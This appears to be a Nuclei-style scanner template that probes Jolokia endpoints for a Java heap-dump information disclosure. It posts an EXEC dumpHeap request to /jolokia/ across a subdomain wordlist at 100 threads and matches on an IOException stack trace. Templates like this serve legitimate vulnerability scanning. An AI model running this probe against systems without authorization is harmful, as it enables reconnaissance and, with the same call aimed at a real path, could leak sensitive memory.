id: jolokia-heap-info-disclosure
info:
  name: Jolokia Java Heap Information Disclosure
  author: milo2012
  severity: info
  tags: jolokia,disclosure
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100
    raw:
      - |
        POST /jolokia/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
        Accept-Language: en-GB,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 136

        {
           "type":"EXEC",
           "mbean":"com.sun.management:type=HotSpotDiagnostic",
           "operation":"dumpHeap",
           "arguments":[
              "/tmp1234/test1.hprof",
              0
           ]
        }
    matchers:
      - type: word
        words:
          - 'stacktrace":"java.io.IOException: No such file or directory'
        part: body
